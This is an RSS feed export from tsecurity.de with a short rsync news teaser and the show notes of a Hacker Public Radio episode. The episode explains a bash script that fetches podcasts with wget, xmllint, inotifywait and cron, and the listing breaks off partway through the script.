<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hpr4373+rsync+with+stdin%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 05:47:35 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 05:47:35 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hpr4373+rsync+with+stdin%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=hpr4373+rsync+with+stdin%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Download der Woche: rsync]]></title>
<description><![CDATA[Download der Woche: rsync

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Mi., 22.07.2026 - 07:00


            Wer große Datenmengen im Netzwerk bewegt, kommt an diesem Klassiker kaum vorbei. Das kostenlose ...]]></description>
<link>https://tsecurity.de/de/3685387/server/download-der-woche-rsync/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685387/server/download-der-woche-rsync/</guid>
<pubDate>Wed, 22 Jul 2026 08:15:16 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Download der Woche: rsync</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/download-der-woche-rsync"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/187004068_m.jpg?itok=NW4fXdVR" width="480" height="319" alt="Ein gelbes Puzzleteil mit Download-Symbol ist über vier Verbindungslinien mit vier blauen Puzzleteilen verknüpft, die jeweils ein Dokumentensymbol zeigen, vor grünem Hintergrund." title="Ein zentraler Ausgangspunkt, viele verteilte Dateien: So funktioniert effiziente Synchronisation mit rsync. (Quelle: fauzi89 - 123RF)" typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-07-22T07:00:00+02:00" title="Mittwoch, Juli 22, 2026 - 07:00" class="datetime">Mi., 22.07.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Wer große Datenmengen im Netzwerk bewegt, kommt an diesem Klassiker kaum vorbei. Das kostenlose Linux-Tool "rsync" gleicht Dateien blitzschnell ab und überträgt dabei nur, was sich wirklich geändert hat.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/news" hreflang="en">News</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/download-der-woche-rsync" rel="tag" title="Download der Woche: rsync" hreflang="en">Weiterlesen<span class="visually-hidden"> über Download der Woche: rsync</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4688: Downloading Podcasts with a Shell Script]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.






01 Introduction






In this episode I will describe techniques for downloading podcasts using basic shell commands such as wget. 


I will illustrate this using a bash script that can be used to download HPR podcasts.


Even if you d...]]></description>
<link>https://tsecurity.de/de/3685037/podcasts/hpr4688-downloading-podcasts-with-a-shell-script/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685037/podcasts/hpr4688-downloading-podcasts-with-a-shell-script/</guid>
<pubDate>Wed, 22 Jul 2026 02:06:46 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

</p>

<p>
01 Introduction</p>

<p>

</p>

<p>
In this episode I will describe techniques for downloading podcasts using basic shell commands such as wget. </p>

<p>
I will illustrate this using a bash script that can be used to download HPR podcasts.</p>

<p>
Even if you do not have any interest in downloading your podcasts using this method, you may find some of the methods useful or interesting.</p>

<p>
It is the principles that are discussed here that are important, rather than the implementation. </p>

<p>

</p>

<p>
02</p>

<p>
I realize that there are already a number of different podcast download programs available,  including at least one written in bash. </p>

<p>
However, you may feel that none of these suit how you wish to do things and want to create your own system tailored to your specific needs.</p>

<p>
If so, then I hope the following is of some use to you.</p>

<p>
If not, then you may still find some of the things discussed here to still be of interest.</p>

<p>

</p>

<p>
Some of the subjects I cover include</p>

<p>
wget to a user defined file name.</p>

<p>
parsing xml with xmllint.</p>

<p>
using inotifywait to trigger an action when a file is created or modified.</p>

<p>
using notify-send to send a message to the notification area.</p>

<p>
and</p>

<p>
a way of allowing a cron job to send a message to the user interface.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
03 Background</p>

<p>

</p>

<p>
There has been an ongoing discussion in comments to some HPR episodes about problems downloading HPR podcast episodes. </p>

<p>
Apparently some people have been experiencing problems with the way the episode URLs are structured. </p>

<p>

</p>

<p>
04</p>

<p>
I am afraid that I don't fully understand the nature of these problems, so I won't  be addressing that problem directly.</p>

<p>
Instead, I will present a bash script that I have written which can be used to download HPR podcasts.</p>

<p>
This bash script can be run using cron to automatically fetch new HPR podcasts and save them to a designated directory.</p>

<p>
This is a simplified version of a script that I have used for years to download HPR and other podcasts.</p>

<p>

</p>

<p>
05</p>

<p>
I won't try to read the full bash script out in this podcast, as that would be a bit dull to listen to.</p>

<p>
I will instead describe what each section does and why I chose to do things that way.</p>

<p>
Perhaps other people can offer suggestions of better ways to do things.</p>

<p>
I will post the full bash script in the show notes.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
06 Fetching Podcasts</p>

<p>

</p>

<p>
The standard way of distributing podcasts is to publish an RSS feed containing URL links to the audio files.</p>

<p>
RSS is a very long established and widely supported mechanism for this and other purposes.</p>

<p>
An RSS feed is basically an XML document which can be accessed over HTTP.</p>

<p>
These URLs contained in the RSS XML document can then be used to download the actual audio files, such as MP3 or OGG files.</p>

<p>

</p>

<p>
07</p>

<p>
Basically what we need to do is the following</p>

<p>

</p>

<p>
• Download the RSS XML document.</p>

<p>
• Extract the URL links to the audio files.</p>

<p>
• Compare the list of these links to a previously saved list to see which ones are new and which ones are ones that we previously downloaded.</p>

<p>

</p>

<p>
08</p>

<p>
• Make a list of the new URLs.</p>

<p>
• Go through this list of new URLs and download each of the new audio files.</p>

<p>
• Check to see that we actually received the new audio file.</p>

<p>
• Add the URLs of the files we successfully downloaded to our saved list of podcast URLs</p>

<p>

</p>

<p>
09</p>

<p>
In addition to this, we would like to have the above happen automatically in the background without our having to take any action on our own.</p>

<p>
We may wish to receive a notification of when a new podcast has arrived however.</p>

<p>
We would probably also wish to receive notification of any errors or failures.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
10 Fetching Podcasts - The Preliminaries</p>

<p>

</p>

<p>
Our desire to be able to run the script automatically imposes some requirements on our solution.</p>

<p>
To schedule the script we will use cron.</p>

<p>
Cron is a Linux facility to run scripts on a schedule.</p>

<p>

</p>

<p>
11</p>

<p>
One of the side effects of using cron however is  that we need to specify the full path to the locations where we intend to keep any data files, plus also the full path to where we intend to put the downloaded podcasts.</p>

<p>

</p>

<p>
12</p>

<p>
So the first thing we need to do in our script is to specify a number of different values for things like file location, the URL for the HPR RSS feed, and several other things as well.</p>

<p>

</p>

<p>
I will skip over the details of these, although I may make reference to them later.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
13 Get the RSS Data</p>

<p>

</p>

<p>
The first thing of real substance to do is to fetch the current RSS feed data.</p>

<p>
I have put this in a bash function called getrssurldata</p>

<p>

</p>

<p>
The contents of this function are a one liner, but with a number of elements chained together through pipes.</p>

<p>

</p>

<p>
14 Downloading the RSS XML Document</p>

<p>
• First we use wget, which is a standard command on most Linux distros.</p>

<p>
• We specify four things.</p>

<p>
• First we set a timeout. I have chosen 20 seconds.</p>

<p>
• Next we set the retry limit. I have chosen 3.</p>

<p>

</p>

<p>
15</p>

<p>
• Then we specify that the output of wget is sent to stdout rather than saved as a file.</p>

<p>
• This is done by using the -O option followed by a space and then a dash.</p>

<p>
• The O option is usually used to specify a file to save the output to, but when used with a dash causes output to go to stdout.</p>

<p>
• Then we specify the URL of the HPR RSS feed.</p>

<p>

</p>

<p>
16 Contents of the XML Document</p>

<p>
This gives us the HPR RSS XML document. </p>

<p>
There are about 5,000 lines in this RSS document.</p>

<p>
Most of those lines are the show notes which are also included in the feed.</p>

<p>

</p>

<p>
17 Extracting the Podcast Episode URLs</p>

<p>
There are only 10 lines of the document that contain information that we are interested in however.</p>

<p>
These lines are enclosed in "enclosure" XML tags. </p>

<p>
We just need to find those lines and separate out the URLs</p>

<p>

</p>

<p>
18 Standard Command Line Tools</p>

<p>
There are two ways that we can do this.</p>

<p>
One is to use a combination of grep, sed, and cut.</p>

<p>
Grep can find the lines containing the enclosure tags.</p>

<p>
Sed and cut can extract the URL from the surrounding extraneous data. </p>

<p>

</p>

<p>
19</p>

<p>
However, this method does not discriminate between real enclosure tags in the data portion of the RSS feed and enclosure tags in the show notes which are included in the feed from episodes such as this one.</p>

<p>
This may be an acceptable problem in practical terms, but we can do better.</p>

<p>

</p>

<p>
20 Using an XML Parser</p>

<p>
The other method is to actually parse the XML document.</p>

<p>
there are at least two command line XML parsers that I am aware of.</p>

<p>
These are "xmllint", and "xlmstarlet".</p>

<p>
I have used xmllint in this example.</p>

<p>
I have not used xmlstarlet, so I can't offer any comment on how easy or difficult to use it is.</p>

<p>

</p>

<p>
21</p>

<p>
I won't give a detailed explanation of all the things that xmllint can do.</p>

<p>
It has many features, most of which, as the name suggests, have to do with finding formatting problems with the XML itself.</p>

<p>
Describing everything it can do would be at least one episode in itself. </p>

<p>
I will instead just give the particular command used and explain each element of it.</p>

<p>

</p>

<p>
22</p>

<p>
In this example assume that we are piping the output of wget directly into xmllint.</p>

<p>
The complete command is</p>

<p>

</p>

<p>
xmllint --xpath "//channel/item/enclosure/@url" - | cut -d'"' -f2</p>

<p>

</p>

<p>
23</p>

<p>
In this example,</p>

<p>
xmllint is the name of the command.</p>

<p>
--xpath tells it to parse the document according to the string which follows.</p>

<p>
"//channel/item/enclosure/@url" tells it to find a series of tags in the hierarchy of channel, followed by item, followed by enclosure, and then extract the url attribute from the enclosure tag.</p>

<p>
The "-" which follows tells it to look for input from stdin rather than from a file.</p>

<p>

</p>

<p>
24</p>

<p>
The result is a string which has the url attribute name, an equal sign, and the URL that we want enclosed in quotes.</p>

<p>
To get just the URL itself, we pipe the output from xmllint into cut, using the doublequote characters as delimiters.</p>

<p>
We then save the result in a temporary file.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
25 Finding the New Episodes</p>

<p>

</p>

<p>
Next we wish to find the new podcast episodes.</p>

<p>
Each HPR episode is identified by a unique URL.</p>

<p>
This means that if we save the URLs of episodes that we have already downloaded, we just have to look for the URLs that do not appear in this saved list.</p>

<p>

</p>

<p>
https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4659/hpr4659.mp3</p>

<p>

</p>

<p>
26</p>

<p>
The easiest way to do this is to take our two lists of URLs, sort each into temporary files, and then compare the sorted URLs using the "comm" command.</p>

<p>

</p>

<p>
27</p>

<p>
This is simple, but has a drawback.</p>

<p>
Some podcasts occasionally change distributors.</p>

<p>
When they do this, the old podcasts are re-published with new URLs and you end up downloading a lot of old episodes over again.</p>

<p>

</p>

<p>
28</p>

<p>
With HPR we could get around this by extracting just the file name and looking for that instead of the full URL.</p>

<p>

</p>

<p>
I will however leave that problem as an exercise for the student and just accept that if the URL format changes we may end up downloading old episodes over again.</p>

<p>
Since the feed has a maximum of only 10 episodes in it however, that isn't really that big of a problem.</p>

<p>
It would be more of a problem with podcasts which have very large numbers of episodes in their feed, but the solutions to those will be feed specific. </p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
29 Downloading the New Podcasts</p>

<p>

</p>

<p>
We should now have a list of URLs for the new podcasts we do not already have. </p>

<p>
Typically this should be only one file, but there could be several, or even as many as 10, if we have not turned on our computer in a while.</p>

<p>

</p>

<p>
Therefore, we need to iterate through the file of new podcast URLs and download each one.</p>

<p>

</p>

<p>
30</p>

<p>
Before we do that however, we should check to see if there is in fact anything new to download.</p>

<p>
To do this, simply use "wc -l" to count the number of lines in the list of new URLs and save the resulting number.</p>

<p>

</p>

<p>
31</p>

<p>
If this number is zero, there is nothing to download, we can skip the download step. </p>

<p>
As an additional check, we should see if the number of downloads exceeds some threshold value that we wish to set.</p>

<p>
This is not a major problem with HPR, but some podcasts have hundreds of files in their RSS feed rather than just the most recent ones.</p>

<p>
If we do exceed our download limit, then we need to log an error and skip downloading. </p>

<p>

</p>

<p>
32</p>

<p>
Assuming there are no problems so far however, the first thing we need to do is to extract the name of the audio file from the URL.</p>

<p>
We can do that using the "basename" command.</p>

<p>
We will use this to specify the name that we use when we save the audio file. </p>

<p>

</p>

<p>
33</p>

<p>
HPR has a very well formed file name. </p>

<p>
Some podcasts do not however, and for those you would need to construct some sort of suitable name either using information found in the URL or simply creating a name using a time stamp. </p>

<p>

</p>

<p>
34</p>

<p>
Next we download the audio file using wget.</p>

<p>

</p>

<p>
This is similar to how we downloaded the RSS feed, but with a few changes.</p>

<p>
One is that I have increased the timeout to 90 seconds. </p>

<p>
This may not have been necessary, but seemed like a good idea.</p>

<p>

</p>

<p>
35</p>

<p>
The next is that when specifying the output file name using -O, we use the file name we extracted from the URL.</p>

<p>

</p>

<p>
The third is that we specify a destination directory using the -P option. </p>

<p>

</p>

<p>
36</p>

<p>
After wget has finished, including any retries that it had to do, we next check that the expected new file is both present and not empty.</p>

<p>
We did this using an "if" statement with the "-s" option.</p>

<p>

</p>

<p>
If the file was found and not zero, then we add that URL to a temporary list of downloaded URLs.</p>

<p>

</p>

<p>
37</p>

<p>
If the file was not present, or was zero length, we output an error message to an error log. </p>

<p>
I will come back to this point later.</p>

<p>

</p>

<p>
38</p>

<p>
Next, if there is more that one podcast to download we sleep for 3 seconds. </p>

<p>
While not strictly necessary, it is considered to be "polite" to not hammer a server repeatedly, but rather to put a small delay between file downloads..</p>

<p>

</p>

<p>
39</p>

<p>
After we have downloaded all the audio files in our list, we can add the list of URLs for the files downloaded to the permanent list.</p>

<p>
While we are at it, we should use "tail" to trim the permanent log to keep it from growing indefinitely.</p>

<p>
This limit should be several times bigger than the number of files in the RSS feed. </p>

<p>
In this case I selected 50. </p>

<p>

</p>

<p>
40</p>

<p>
Finally we write any errors to the permanent error log, and also write these same errors to another file used to signal errors for display to the user.</p>

<p>

</p>

<p>
We have now successfully downloaded at least one HPR podcast.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
41 Notify the User of Events</p>

<p>

</p>

<p>
It would be convenient to be informed of new podcast downloads when they occur, and also be notified of any errors.</p>

<p>

</p>

<p>
One of the limitations of cron jobs is that they cannot access the user interface.</p>

<p>
This means that we cannot readily send a message directly to the notification system to inform the user of the presence of new podcasts or of errors.</p>

<p>

</p>

<p>
42 inotifywait</p>

<p>
The solution to this is to use "inotifywait" to monitor particular files and directories for changes.</p>

<p>

</p>

<p>
The man page for inotifywait states the following - </p>

<p>

</p>

<p>
43</p>

<p>
inotifywait  efficiently  waits for changes to files using Linux's inotify(7) interface.  It is suitable for waiting  for  changes  to  files from  shell  scripts.  It can either exit once an event occurs, or continually execute and output events as they occur.</p>

<p>

</p>

<p>
End of quote.</p>

<p>

</p>

<p>
44</p>

<p>
In many Linux distros, inotifywait is provided by the "inotify-tools" package.</p>

<p>

</p>

<p>
I won't go over all the features of inotifywait. </p>

<p>
Instead, I will just describe how to use it for our purposes here.</p>

<p>

</p>

<p>
45 inotifywait Modes</p>

<p>

</p>

<p>
I should point out first though that inotifywait operates in two different modes.</p>

<p>
In the normal default mode, it exits after being triggered by an event and must be re-established again in order to resume monitoring.</p>

<p>
In monitor mode, which is enabled by using the "-m" option, it runs indefinitely, responding to events.</p>

<p>
I will use the default mode here.</p>

<p>

</p>

<p>
46</p>

<p>
The man page for inotifywait provides a simple example that we could copy and modify for our purposes.</p>

<p>
A great many examples that you  will find are based on this example.</p>

<p>
However, it doesn't quite do what we want, so we need to change a few things.</p>

<p>

</p>

<p>
47 podfetchnotify</p>

<p>
The first shell script is one which monitors for the arrival of new podcasts and sends a notification to the user.</p>

<p>
I will call this "podfetchnotify".</p>

<p>
The complete scripts are in the show notes, I will just provide a brief description here.</p>

<p>

</p>

<p>
48 Setting Up Event Watches Using  inotifywait</p>

<p>
The script is enclosed in a while loop which run indefinitely.</p>

<p>
In the first line inside the while loop, we call inotifywait.</p>

<p>
inotifywait will then block until the event it is told to look for occurs.</p>

<p>
In short, execution of the script will wait there until an event occurs.</p>

<p>

</p>

<p>
49</p>

<p>
The names of the events are listed in the man file.</p>

<p>
In this case we are looking for "modify", "create", and "moved_to".</p>

<p>
Each of these does pretty much as you would expect, reacting to modifying an existing file, creating a new file, or moving a file to that directory.</p>

<p>

</p>

<p>
50 Problems When Testing Using Text Editors</p>

<p>
I should point out that if you are testing a script which uses inotifywait, then modifying a file with a text editor may not produce the results that you may think it would. </p>

<p>
Instead it treats this as a new file with the same name, with the original file being erased.</p>

<p>
Since inotifywait attaches itself to the inode rather than the filename, it sees the file that the text editor changed as being a new file.</p>

<p>
If you wish to test this realistically, then use "echo" to overwrite the file by using I/O redirection.</p>

<p>

</p>

<p>
51 Capturing Output</p>

<p>
In my example I capture the output from standard out into a variable, but I don't do anything with it.</p>

<p>
If you wish to for example display the name of the newly downloaded podcast file, then use the --format option along with an appropriate formatting code. </p>

<p>
There are details about this in the man page.</p>

<p>

</p>

<p>
On the next line we capture the exit code using "$?"</p>

<p>

</p>

<p>
52 Responding to Exit Codes</p>

<p>
If the exit code was zero, then a monitored event was triggered and there should a new podcast in the directory.</p>

<p>
In this case we display a message indicating that a new podcast has arrived.</p>

<p>
I will describe how to send notifications shortly. </p>

<p>

</p>

<p>
If the exit code was not zero, then an error occurred.</p>

<p>
An example of such an error would be if the directory were not present when monitoring was started.</p>

<p>
In this case we display a message indicating that a fatal error has occurred and then exit.</p>

<p>

</p>

<p>
53 Delay for More Podcasts</p>

<p>
Finally, we use "sleep" to wait for some arbitrary period of time to prevent notifications from being triggered multiple times if several podcasts were being downloaded in succession.</p>

<p>
In this case I chose to wait for 60 seconds.</p>

<p>

</p>

<p>
54</p>

<p>
We have now completed the process and can return to the top of the loop and resume waiting using inotifywait.</p>

<p>

</p>

<p>
55 Sending Notifications to the User</p>

<p>
I mentioned above about sending notification messages to the user.</p>

<p>
In the Gnome desktop, notification messages appear from the centre of the top bar in a list.</p>

<p>
Other desktops or operating systems may have something similar.</p>

<p>

</p>

<p>
56</p>

<p>
To send a notification message to the notification area, you use the "notify-send" command.</p>

<p>
Simply follow notify-send with a quoted string and it will be displayed in the notification area. </p>

<p>

</p>

<p>

</p>

<p>
57 podfetcherrornotify</p>

<p>
The second shell script is one which notifies the user of errors.</p>

<p>
I will call this "podfetcherrornotify".</p>

<p>
With this shell script we set up a watch on a file which contains any error messages from podfetch.</p>

<p>
This script is very similar to podfetchnotify.</p>

<p>

</p>

<p>
58</p>

<p>
The exceptions are</p>

<p>
With inotifywait we only monitor for "modify".</p>

<p>
There is no sleep command at the end of the loop.</p>

<p>
Instead we sleep for a few seconds just after getting the exit code from inotifywait.</p>

<p>
This helps prevent problems caused by race conditions.</p>

<p>

</p>

<p>
59</p>

<p>
Next we check the inotifywait exit code.</p>

<p>
If it was zero, then we read the error report file and send a notification message to the user containing that error message.</p>

<p>

</p>

<p>
60</p>

<p>
If it was not zero, then we check to make sure that the directory that should contain the error log exists.</p>

<p>
If it does not exist, then we send a notification message to that effect to the user and terminate the script.</p>

<p>

</p>

<p>
61</p>

<p>
If the directory exists, then we check to see if the error message file used for signalling exists.</p>

<p>
If the file does not exist, then we create it.</p>

<p>

</p>

<p>
62</p>

<p>
One of the reasons for an inotifywait error is that if the file that it is told to monitor does not exist, it cannot set up a watch condition.</p>

<p>
By creating the file we correct the cause of the error and allow  inotifywait to operate normally.</p>

<p>

</p>

<p>
63</p>

<p>
Finally we increment an error counter and check to see if the limit is exceeded.</p>

<p>
If there are excessive errors, then send a notification message to the user and exit.</p>

<p>
The reason for this is to give the user an indication that the error notifications are not working for some reason and there may be a problem that needs looking into.</p>

<p>

</p>

<p>
64</p>

<p>
The error counter is reset every time the inotifywait exit status is ok, so occasional unexpected glitches should be something that is ignored.</p>

<p>
Of course podcast fetching errors are something that will probably happen only rarely if at all, so this final step may be seen as an unnecessary embellishment. </p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
65 Installing the Scripts</p>

<p>

</p>

<p>
Next I will describe how to install and prepare the scripts to run.</p>

<p>
We need to perform the following steps.</p>

<p>

</p>

<p>
66</p>

<p>
• First, we need to create a directory to hold the scripts and their associated data files.</p>

<p>
• Next we need to create a directory to hold the downloaded podcasts.</p>

<p>
• Then we must copy the scripts to these directories and make them executable. </p>

<p>
• Then, we must edit the scripts to have the file path in the script match the locations of the new directories that we created.</p>

<p>

</p>

<p>
67</p>

<p>
• Then we need to install xmllint, or alternatively modify the download script to comment out the use of xmllint and enable the alternative method using grep and sed instead.</p>

<p>
• Then we need to run each script manually from the command line to check for errors.</p>

<p>
• If podfetch ran correctly, it should download the most recent 10 podcasts during this test.</p>

<p>

</p>

<p>
68 Adding podfetch to the Crontab</p>

<p>
The above describes how to run the scripts manually.</p>

<p>
In order to fetch podcasts automatically, we need to add the podfetch script to the cron schedule.</p>

<p>
To do this, open a terminal.</p>

<p>

</p>

<p>
69</p>

<p>
Type "crontab -e", and then press return.</p>

<p>
A text editor should open up containing the crontab file.</p>

<p>
On Ubuntu, this editor is GNU nano.</p>

<p>
Enter the appropriate cron parameters.</p>

<p>
I will provide an example here for running it 12 minutes past the hour every three hours.</p>

<p>

</p>

<p>
70</p>

<p>
12 */3 * * *  /home/username/pathtofiles/podfetch.sh</p>

<p>

</p>

<p>
71</p>

<p>
I won't explain cron in detail here.</p>

<p>
The example that I have just given should be good enough for most people.</p>

<p>
The "*/3" parameter will cause it to run every three hours.</p>

<p>
The "12" parameter will cause it to run 12 minutes past the hour when it does run.</p>

<p>

</p>

<p>
72</p>

<p>
Checking every three hours should be good enough for most people, but you can adjust that as you see fit.</p>

<p>
I would recommend however that you don't check more frequently than once per hour.</p>

<p>
Checking more frequently than necessary puts extra load on the distribution servers. </p>

<p>
It is very unlikely that you really do need each new episode the moment it is available. </p>

<p>

</p>

<p>
73</p>

<p>
I would also recommend changing the "12" parameter to some other random minute value.</p>

<p>
I would suggest avoiding on the hour or on the half hour, as a lot of other people are probably checking at those times, and it would be better to spread the load out more evenly over time.</p>

<p>

</p>

<p>
74</p>

<p>
The file path parameter should of course match the actual path to wherever you have located the script, including the correct user name.</p>

<p>

</p>

<p>
75 Making the Notification Scripts Start Automatically</p>

<p>
The two notification scripts can be made to start automatically.</p>

<p>
The exact method to do this may vary according to distribution or desktop.</p>

<p>

</p>

<p>
76</p>

<p>
On Ubuntu this is done using the Startup Applications Preferences GUI program, which should come already installed.</p>

<p>

</p>

<p>
77</p>

<p>
I won't go into details on this here, it should be fairly self evident how to use it once you see it.</p>

<p>
What this program does is to create ".desktop" files in the ".config/autostart" directory in your home directory.</p>

<p>

</p>

<p>
78</p>

<p>
These ".desktop" files are all run automatically on start up.</p>

<p>
Once you have added the notification scripts, you will need to log out and then log back in to make them active.</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
79 Conclusion</p>

<p>

</p>

<p>
I this episode I explained how to write a set of simple shell scripts to automatically download each new episode of HPR as it comes out and to notify you of its arrival. </p>

<p>

</p>

<p>
80</p>

<p>
The download script described here is tailored specifically for use with HPR only.</p>

<p>
However, it was derived from a larger script that downloaded other podcasts as well, based on information read in from a text file.</p>

<p>
If you are feeling ambitious, you can add those features back into this to handle all of the podcasts that you listen to.</p>

<p>

</p>

<p>
81</p>

<p>
In a comment to another episode of HPR I had said that I would cover ID3 tags in MP3 files, but this episode is long enough now, so I will leave that subject for later.</p>

<p>

</p>

<p>
I look forward to seeing you again later on another episode of Hack Public Radio.</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
podfetchdownloader</p>

<p>

</p>

<p>
#!/bin/bash</p>

<p>

</p>

<p>
# Fetch pending HPR podcasts listed in the HPR RSS feed.</p>

<p>
# 8-Jun-2026</p>

<p>
# Licensed under GPLv3 or later.</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>

</p>

<p>
# Today's date and time as YYYYMMDDHHMMSS. </p>

<p>
podttimestamp=$( date +"%Y%m%d%H%M%S" )</p>

<p>

</p>

<p>
# The absolute path to the script. This is necessary when running it</p>

<p>
# using a cron job.</p>

<p>
podpath="/home/me/Apps/hprfetch"</p>

<p>

</p>

<p>
# This is the absolute path to where to store the podcast files.</p>

<p>
podfilepath="/home/me/Music/Podcasts/HPR"</p>

<p>

</p>

<p>
# Create the full path names here for all the text files used.</p>

<p>
podcastsfetched="$podpath/podcastsfetched.txt"</p>

<p>
poderrorslog="$podpath/poderrorslog.txt"</p>

<p>
poderrorsreport="$podpath/poderrorsreport.txt"</p>

<p>

</p>

<p>
tmpoldurlssorted="$podpath/tmpoldurlssorted.txt"</p>

<p>
tmppodsnew="$podpath/tmppodsnew.txt" </p>

<p>
tmppodstodownload="$podpath/tmppodstodownload.txt" </p>

<p>
tmppodserrors="$podpath/tmppodserrors.txt" </p>

<p>
tmppodcastsfetched="$podpath/tmppodcastsfetched.txt"</p>

<p>
tmplog="$podpath/tmplog.txt"</p>

<p>

</p>

<p>
# The URL for the HPR RSS feed.</p>

<p>
PodURL="http://hackerpublicradio.org/hpr_rss.php"</p>

<p>

</p>

<p>
# Limit on number of podcasts to download.</p>

<p>
DownloadLimit=11</p>

<p>

</p>

<p>
# Name of the podcast.</p>

<p>
PodName="Hacker Public Radio"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Check if the required paths exist.</p>

<p>
# If this path does not exist, cannot log the error.</p>

<p>
if [[ ! -d "$podpath/" ]]; then</p>

<p>
	echo "$podttimestamp Error - Could not find $podfilepath."</p>

<p>
	exit 1</p>

<p>
fi</p>

<p>

</p>

<p>
# Where to store the podcast file fetched.</p>

<p>
if [[ ! -d "$podfilepath/" ]]; then</p>

<p>
	echo "$podttimestamp Error - Could not find $podfilepath." &gt;&gt; $tmppodserrors</p>

<p>
	# Copy the errors log from the temporary errors file to the permanent files.</p>

<p>
	LogErrors</p>

<p>
	exit 1</p>

<p>
fi</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Check if the podcast log exists. We read it before we write to it,</p>

<p>
# so it must exist or we will hang on it not being present.</p>

<p>
if [[ ! -e $podcastsfetched ]]; then</p>

<p>
	touch $podcastsfetched</p>

<p>
fi</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Delete the specified files if they exist.</p>

<p>
# This accepts multiple file names in a variable number of parameters.</p>

<p>
CleanupFiles ()</p>

<p>
{</p>

<p>
	# $@ accepts multiple parameters.</p>

<p>
	for f in "$@"; do</p>

<p>
		# Check if the file exists.</p>

<p>
		if [ -e "$f" ]; then</p>

<p>
			rm "$f"</p>

<p>
		fi</p>

<p>
	done</p>

<p>
}</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Copy the errors log from the temporary errors file to the permanent files.</p>

<p>
LogErrors () {</p>

<p>
	if [ -e $tmppodserrors ]; then</p>

<p>
		# The permanent log.</p>

<p>
		cat $tmppodserrors &gt;&gt; $poderrorslog</p>

<p>
		# This file is monitored for display by other scripts.</p>

<p>
		cat $tmppodserrors &gt; $poderrorsreport</p>

<p>
	fi</p>

<p>
}</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>

</p>

<p>
# Get the URL data from an RSS feed</p>

<p>
GetRSSURLData () {</p>

<p>

</p>

<p>
	wget --timeout=20 --tries=3 -O - "$PodURL" \</p>

<p>
	| xmllint --xpath "//channel/item/enclosure/@url" - | cut -d'"' -f2 \</p>

<p>
	| sort &gt; $tmppodsnew</p>

<p>

</p>

<p>
	# This is an alternate method that does not use xmllint.</p>
